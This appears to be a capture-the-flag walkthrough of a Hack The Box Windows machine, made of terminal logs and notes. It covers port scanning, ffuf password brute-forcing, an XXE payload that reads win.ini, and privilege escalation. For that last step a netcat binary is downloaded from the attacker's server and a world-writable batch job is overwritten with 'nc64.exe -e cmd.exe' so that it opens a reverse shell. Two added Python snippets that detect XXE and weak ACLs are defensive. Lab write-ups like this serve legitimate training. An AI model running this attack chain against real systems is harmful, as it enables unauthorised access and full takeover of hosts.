root@htb:~$ sudo nmap -sV -sC -T4 {targetIP} -p-
PORT    STATE SERVICE  VERSION
22/tcp  open  ssh      OpenSSH for_Windows_8.1 (protocol 2.0)
| ssh-hostkey:
|   3072 9f:a0:f7:8c:c6:e2:a4:bd:71:87:68:82:3e:5d:b7:9f (RSA)
|   256 90:7d:96:a9:6e:9e:4d:40:94:e7:bb:55:eb:b3:0b:97 (ECDSA)
|_  256 f9:10:eb:76:d4:6d:4f:3e:17:f3:93:d6:0b:8c:4b:81 (ED25519)
80/tcp  open  http     Apache httpd 2.4.41 ((Win64) OpenSSL/1.1.1c PHP/7.2.28)
|_http-server-header: Apache/2.4.41 (Win64) OpenSSL/1.1.1c PHP/7.2.28
|_http-title: MegaShopping
| http-cookie-flags:
|   /:
|     PHPSESSID:
|_      httponly flag not set
443/tcp open  ssl/http Apache httpd 2.4.41 ((Win64) OpenSSL/1.1.1c PHP/7.2.28)
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=localhost
| Not valid before: 2009-11-10T23:48:47
|_Not valid after:  2019-11-08T23:48:47
|_http-server-header: Apache/2.4.41 (Win64) OpenSSL/1.1.1c PHP/7.2.28
| tls-alpn:
|_  http/1.1
| http-cookie-flags:
|   /:
|     PHPSESSID:
|_      httponly flag not set
|_http-title: MegaShopping
* Typically '-sV' is used with Nmap to determine versions, but that's not always enough.
- adding -sC is another good way to determine service versions
- the -sC option runs safe scripts which are designed to provide useful information without being too intrusive or causing harm to the target systems.
* -sC runs the default set of Nmap scripts (NSE scripts), which typically include scripts for service enumeration, version detection, and other basic checks.
* use the -Pn option of Nmap when ICMP packets are blocked by the Windows firewall
- the -Pn option treats all hosts as online and skips host discovery
VULNERABILITY SCANNING
root@htb:~$ sudo nmap --script=vuln {targetIP} -p 22,6789,8080,8443,8843,8880
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
| http-slowloris-check:
| VULNERABLE:
| Slowloris DOS attack
| State: LIKELY VULNERABLE
| IDs: CVE:CVE-2007-6750
| Slowloris tries to keep many connections to the target web server open and hold
| them open as long as possible. It accomplishes this by opening connections to
| the target web server and sending a partial request. By doing so, it starves
| the http server's resources causing Denial Of Service.
|
| Disclosure date: 2009-09-17
| References:
| http://ha.ckers.org/slowloris/
|_ https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6750
|_http-trace: TRACE is enabled
| http-enum:
|_ /icons/: Potentially interesting folder w/ directory listing
|_http-vuln-cve2017-1001000: ERROR: Script execution failed (use -d to debug)
| http-csrf:
| Spidering limited to: maxdepth=3; maxpagecount=20; withinhost=10.129.140.205
| Found the following possible CSRF vulnerabilities:
|
| Path: http://10.129.140.205:80/
| Form id:
|_ Form action:
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
|_http-dombased-xss: Couldn't find any DOM based XSS.
| http-cookie-flags:
| /:
| PHPSESSID:
|_ httponly flag not set
443/tcp open https
|_http-trace: TRACE is enabled
|_http-vuln-cve2017-1001000: ERROR: Script execution failed (use -d to debug)
| http-cookie-flags:
| /:
| PHPSESSID:
| secure flag not set and HTTPS in use
|_ httponly flag not set
| http-csrf:
| Spidering limited to: maxdepth=3; maxpagecount=20; withinhost=10.129.140.205
| Found the following possible CSRF vulnerabilities:
|
| Path: https://10.129.140.205:443/
| Form id:
|_ Form action:
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
|_http-dombased-xss: Couldn't find any DOM based XSS.
| ssl-dh-params:
| VULNERABLE:
| Diffie-Hellman Key Exchange Insufficient Group Strength
| State: VULNERABLE
| Transport Layer Security (TLS) services that use Diffie-Hellman groups
| of insufficient strength, especially those using one of a few commonly
| shared groups, may be susceptible to passive eavesdropping attacks.
| Check results:
| WEAK DH GROUP 1
| Cipher Suite: TLS_DHE_RSA_WITH_AES_256_CBC_SHA
| Modulus Type: Safe prime
| Modulus Source: RFC2409/Oakley Group 2
| Modulus Length: 1024
| Generator Length: 8
| Public Key Length: 1024
| References:
|_ https://weakdh.org
| http-enum:
|_ /icons/: Potentially interesting folder w/ directory listing
| http-slowloris-check:
| VULNERABLE:
| Slowloris DOS attack
| State: LIKELY VULNERABLE
| IDs: CVE:CVE-2007-6750
| Slowloris tries to keep many connections to the target web server open and hold
| them open as long as possible. It accomplishes this by opening connections to
| the target web server and sending a partial request. By doing so, it starves
| the http server's resources causing Denial Of Service.
|
| Disclosure date: 2009-09-17
| References:
| http://ha.ckers.org/slowloris/
|_ https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6750
* the --script=vuln option runs scripts that focus specifically on detecting known
vulnerabilities in the service running on each scanned port (e.g., port 6379)
- e.g., weak configurations, or known vulnerabilities in a redis service
- if no results are found then the service may be fully patched!
#brute force login page
root@htb:~$ find / -iname usernames 2>/dev/null
/usr/share/seclists/Usernames
root@htb:~$ ls
top-usernames-shortlist.txt
root@htb:~$ cp /usr/share/seclists/Usernames/top-usernames-shortlist.txt .
root@htb:~$ find / -iname passwords 2>/dev/null
/usr/share/seclists/Passwords
root@htb:~$ ls
500-worst-passwords.txt
root@htb:~$ cp /usr/share/seclists/Passwords/500-worst-passwords.txt .
#retrieve site parameters
root@htb:~$ burpsuite
BURP > Proxy > BROWSER
URL: 10.129.140.205
- Forward requests until the full page is loaded
BURP > BROWSER > http://10.129.140.205
Welcome ...
Username: admin
Password: pass
BURP > Proxy > BROWSER
Requests
...
PPOST / HTTP/1.1
Host: 10.129.140.205
Content-Length: 28
Cache-Control: max-age=0
Accept-Language: en-US,en;q=0.9
Origin: http://10.129.140.205
Content-Type: application/x-www-form-urlencoded
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.6723.70 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://10.129.140.205/
Accept-Encoding: gzip, deflate, br
Cookie: PHPSESSID=r6m4ghtpl8mo8atrkkig8na2kk
Connection: keep-alive
username=admin&password=pass
right-click on the "request" section > copy to file
Filename: requests.txt
File Type: All Files
root@htb:~$ nano requests.txt
...
username=unameFUZZ&password=passFUZZ
j_username=unameFUZZ&j_password=pwFUZZ&from=%2F&Submit=Sign+in
* add the FUZZ keywords (unameFUZZ / passFUZZ) to the username and password parameters so ffuf can substitute each wordlist
root@htb:~$ ffuf -request requests.txt -request-proto http -mode clusterbomb -w top-usernames-shortlist.txt:unameFUZZ -w 500-worst-passwords.txt:passFUZZ -c -fr "Wrong Credentials" -r
[Status: 200, Size: 3149, Words: 1177, Lines: 97, Duration: 15ms]
* passFUZZ: password
* unameFUZZ: admin
:: Progress: [8483/8483] :: Job [1/1] :: 263 req/sec :: Duration: [0:00:29] :: Errors: 0 ::
* ensure the keyword names (unameFUZZ and passFUZZ) match between the ffuf command and requests.txt
* ffuf's default mode is pitchfork matching
- this is where the wordlists are matched line by line
- ffuf can simulate Burp Suite's clusterbomb style with multiple -w flags, each tagged
with its own keyword, applied to a saved request supplied via -request and -request-proto
- clusterbomb combines all permutations of multiple payload positions,
similar to a nested loop over each payload set
* the -c flag outputs the result in color
* the -r flag follows HTTP redirects during fuzzing
* the -fs flag filters results based on content size
* the -fr flag filters results based on a regex pattern.
#identify potential vulnerable entry points
root@htb:~$ BROWSER > http://10.129.140.205/
username: admin
password: password
* identified orders and contact pages
- the input fields in these pages may be vulnerable
#code review
root@htb:~$ BROWSER > {targetSite:port} > Order > CTRL + U
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<title>Goods & Services</title>
<!-- Modified by Daniel : UI-Fix-9092-->
...
* identified a potential username...daniel
#understand input functions with burp proxy
#analyze intercepted data to see what potential vulns exists
BURP > BROWSER > http://10.129.140.205 > Order
Type of Goods: default
Quantity: 1
Address: test
* http://10.129.140.205/services.php
...
Request
POST /process.php HTTP/1.1
Host: 10.129.140.205
Content-Length: 111
Accept-Language: en-US,en;q=0.9
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.6723.70 Safari/537.36
Content-Type: text/xml
Accept: */*
Origin: http://10.129.140.205
Referer: http://10.129.140.205/services.php
Accept-Encoding: gzip, deflate, br
Cookie: PHPSESSID=r6m4ghtpl8mo8atrkkig8na2kk
Connection: keep-alive
<?xml version = "1.0"?>
<order>
<quantity>1</quantity>
<item>Home Appliances</item>
<address>test</address>
</order>
#search for xml exploit
root@htb:~$ BROWSER > https://www.google.com/
search: xml exploitation hacktricks
https://book.hacktricks.wiki/en/pentesting-web/xxe-xee-xml-external-entity.html
#test an xml exploit's validity
BURP > Request > Repeater
Request
...
POST /process.php HTTP/1.1
Host: 10.129.140.205
Content-Length: 111
Accept-Language: en-US,en;q=0.9
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.6723.70 Safari/537.36
Content-Type: text/xml
Accept: */*
Origin: http://10.129.140.205
Referer: http://10.129.140.205/services.php
Accept-Encoding: gzip, deflate, br
Cookie: PHPSESSID=r6m4ghtpl8mo8atrkkig8na2kk
Connection: keep-alive
<?xml version = "1.0"?>
<!DOCTYPE root [<!ENTITY test SYSTEM 'file:///c:/windows/win.ini'>]>
<order>
<quantity>1</quantity>
<item>&test;</item>
<address>test</address>
</order>
Response
...
HTTP/1.1 200 OK
Date: Sat, 10 May 2025 20:58:28 GMT
Server: Apache/2.4.41 (Win64) OpenSSL/1.1.1c PHP/7.2.28
X-Powered-By: PHP/7.2.28
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Content-Length: 144
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Your order for ; for 16-bit app support
[fonts]
[extensions]
[mci extensions]
[files]
[Mail]
MAPI=1
[Ports]
COM1:=9600,n,8,1
has been processed
* xml entity vulnerability validated
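The fix belongs in the server-side XML handling. As an added example (not the real process.php, which the page does not show), this Python parser reproduces the guard a hardened endpoint would apply to the order body captured above: any DOCTYPE or entity declaration is refused before the parser can resolve it, while the plain order still parses.

```python
import xml.parsers.expat

# Constructed samples: the legitimate order body from the proxy capture and the
# same body carrying the external-entity declaration tested in Repeater.
SAFE_ORDER = """<?xml version = "1.0"?>
<order>
<quantity>1</quantity>
<item>Home Appliances</item>
<address>test</address>
</order>"""

UNSAFE_ORDER = """<?xml version = "1.0"?>
<!DOCTYPE root [<!ENTITY test SYSTEM 'file:///c:/windows/win.ini'>]>
<order>
<quantity>1</quantity>
<item>&test;</item>
<address>test</address>
</order>"""


class UnsafeXmlError(ValueError):
    """Raised when the body declares a DTD or an entity (an XXE indicator)."""


def parse_order(body: str) -> dict:
    """Return the order's child elements as a dict, refusing any DTD/entity declaration."""
    fields, text = {}, []

    def reject(*_args):
        raise UnsafeXmlError("DOCTYPE/entity declarations are not accepted")

    def start(name, _attrs):
        text.clear()

    def end(name):
        if name != "order":                      # leaf element: keep its text
            fields[name] = "".join(text).strip()
        text.clear()

    parser = xml.parsers.expat.ParserCreate()
    parser.StartDoctypeDeclHandler = reject      # fires before any entity is read
    parser.EntityDeclHandler = reject            # also catches a stray internal subset
    parser.StartElementHandler = start
    parser.EndElementHandler = end
    parser.CharacterDataHandler = text.append
    parser.Parse(body, True)
    return fields


def classify(body: str) -> str:
    """'accepted' for a clean order, 'rejected' when the XXE guard trips."""
    try:
        parse_order(body)
        return "accepted"
    except UnsafeXmlError:
        return "rejected"
```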
#
daniel@MARKUP C:\Users\daniel> dir Desktop
Volume in drive C has no label.
Volume Serial Number is BA76-B4E3
Directory of C:\Users\daniel\Desktop
03/05/2020 07:18 AM 35 user.txt
daniel@MARKUP C:\Users\daniel> type Desktop\user.txt
032d2fc8952a8c24e39c8f0ee9918ef7
#privesc
#check current privileges
daniel@MARKUP C:\Users\daniel> whoami /priv
Privilege Name Description State
============================= ============================== =======
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
* nothing pertinent
daniel@MARKUP C:\Users\daniel> dir c:\
Volume in drive C has no label.
Volume Serial Number is BA76-B4E3
Directory of c:\
03/12/2020 03:56 AM <DIR> Log-Management
07/28/2021 03:38 AM 0 Recovery.txt
* these are the only two UNCOMMON files
- always analyze UNCOMMON files prior to going into a rabbit hole
daniel@MARKUP C:\Users\daniel> type c:\Recovery.txt
blank file
daniel@MARKUP C:\Users\daniel> dir c:\Log-Management
Volume in drive C has no label.
Volume Serial Number is BA76-B4E3
Directory of c:\Log-Management
03/06/2020 02:42 AM 346 job.bat
daniel@MARKUP C:\Users\daniel> type c:\Log-Management\job.bat
@echo off
FOR /F "tokens=1,2*" %%V IN ('bcdedit') DO SET adminTest=%%V
IF (%adminTest%)==(Access) goto noAdmin
for /F "tokens=*" %%G in ('wevtutil.exe el') DO (call :do_clear "%%G")
echo.
echo Event Logs have been cleared!
goto theEnd
:do_clear
wevtutil.exe cl %1
goto :eof
:noAdmin
echo You must run this script as an Administrator!
:theEnd
exit
* understand the purpose of the batch file and what can be manipulated
#view file permission
daniel@MARKUP C:\Users\daniel> icacls c:\Log-Management\job.bat
c:\Log-Management\job.bat BUILTIN\Users:(F)
NT AUTHORITY\SYSTEM:(I)(F)
BUILTIN\Administrators:(I)(F)
BUILTIN\Users:(I)(RX)
Successfully processed 1 files; Failed processing 0 files
* wevtutil is used to interact with the Windows Event Log service
- it can retrieve information about event logs and publishers and can
also install and uninstall event manifests, run queries and
export, archive and clear logs
- the el (enumerate logs) parameter lists all event logs currently available
on the system
- the cl (clear log) parameter clears the specified event log
* the icacls command is used to view, modify, back up, and restore NTFS file
and folder permissions (Access Control Lists, or ACLs)
- it's the modern replacement for older tools like cacls and xcacls
* the group BUILTIN\Users has full control (F) over the file; the BUILTIN\Users
group represents all local users
- this includes the user daniel
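An added audit check, not from the page: it parses the icacls output above (copied here as a constructed sample) and reports every ACE that lets a principal outside SYSTEM/Administrators modify the file, which is exactly the condition that makes a script run by a privileged job dangerous.

```python
import re

# Constructed sample: the icacls output for job.bat as shown above.
ICACLS_OUTPUT = r"""c:\Log-Management\job.bat BUILTIN\Users:(F)
                          NT AUTHORITY\SYSTEM:(I)(F)
                          BUILTIN\Administrators:(I)(F)
                          BUILTIN\Users:(I)(RX)
Successfully processed 1 files; Failed processing 0 files"""

# Simple and granular icacls rights that allow changing the file's content or ACL.
WRITE_RIGHTS = {"F", "M", "W", "D", "WD", "AD", "WA", "WEA", "DE", "WDAC", "WO"}
# Principals expected to hold write access on a script executed with admin rights.
TRUSTED = {"NT AUTHORITY\\SYSTEM", "BUILTIN\\Administrators", "CREATOR OWNER"}


def parse_icacls(output: str) -> list:
    """Return (path, principal, rights) per ACE; assumes the path has no spaces."""
    entries, path = [], None
    for raw in output.splitlines():
        line = raw.strip()
        if not line or line.startswith("Successfully processed"):
            continue
        if not raw.startswith(" "):              # unindented: path followed by first ACE
            path, _, line = line.partition(" ")
        who, _, flags = line.rpartition(":")     # "BUILTIN\Users" : "(I)(RX)"
        rights = {r for grp in re.findall(r"\(([^)]+)\)", flags) for r in grp.split(",")}
        entries.append((path, who, rights))
    return entries


def weak_aces(output: str) -> list:
    """(principal, write rights) for every ACE granting modification to a non-admin."""
    return [(who, sorted(rights & WRITE_RIGHTS))
            for _path, who, rights in parse_icacls(output)
            if who not in TRUSTED and rights & WRITE_RIGHTS]
```

Any result from weak_aces on a file that a scheduled task or service runs as an administrator is a finding to fix by restricting the ACL, not just by rewriting the script.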
#use the batch script to execute the transferred netcat in order to get a reverse shell
daniel@MARKUP C:\Users\daniel>tasklist /V
ERROR: Access denied
daniel@MARKUP C:\Users\daniel>powershell
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.
PS C:\Users\daniel> get-process
Handles NPM(K) PM(K) WS(K) CPU(s) Id SI ProcessName
------- ------ ----- ----- ------ -- -- -----------
31 5 736 2068 1824 1 wevtutil
root@htb:~$ wget https://github.com/rahuldottech/netcat-for-windows/releases/download/1.12/nc64.exe
2025-05-10 21:42:31 (105 MB/s) - ‘nc64.exe’ saved [45272/45272]
root@htb:~$ python3 -m http.server 8081
PS C:\Users\daniel> wget http://10.10.14.215:8081/nc64.exe -OutFile nc64.exe
PS C:\Users\daniel> cmd
daniel@MARKUP C:\Users\daniel> cd c:\Log-Management
daniel@MARKUP c:\Log-Management>copy c:\users\daniel\nc64.exe c:\Log-Management
1 file(s) copied.
daniel@MARKUP C:\Users\daniel> echo C:\Log-Management\nc64.exe -e cmd.exe 10.10.14.215 4321 > C:\Log-Management\job.bat
* DO NOT enclose the values in quotes!
daniel@MARKUP c:\Log-Management>type job.bat
C:\Log-Management\nc64.exe -e cmd.exe 10.10.14.215 4321
root@htb:~$ nc -nlvp 4321
...
* wait for the script to execute
root@htb:~$ nc...
listening on [any] 4321 ...
connect to [10.10.14.215] from (UNKNOWN) [10.129.24.24] 49686
Microsoft Windows [Version 10.0.17763.107]
(c) 2018 Microsoft Corporation. All rights reserved.
C:\Windows\system32> type C:\Users\Administrator\Desktop\root.txt
f574a3e7650cebd8c39784299cb570f8